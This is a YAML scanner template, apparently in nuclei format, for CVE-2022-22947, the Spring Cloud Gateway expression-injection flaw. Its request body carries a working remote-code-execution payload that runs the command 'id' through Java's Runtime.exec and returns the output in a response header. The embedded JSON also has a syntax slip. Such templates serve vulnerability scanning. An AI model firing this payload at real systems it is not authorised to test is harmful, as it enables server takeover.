id: CVE-2022-22947
finger:
  - springcloud
info:
  name: springcloud gateway ssti rce
  author: anoy
  severity: critical
  description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
  tags: springcloud

requests:
  - method: GET
    path:
      - "{{BaseURL}}/actuator/gateway/routes/code"
    body: |
      {
        "id": "code",
        "filters": [{
          "name": "AddResponseHeader",
          "args":{
            "name": "Result",
            "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
          }
          }]
        "uri": "http://ggg.cpdd:80"
      }
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 201
      - type: status
        status:
          - 400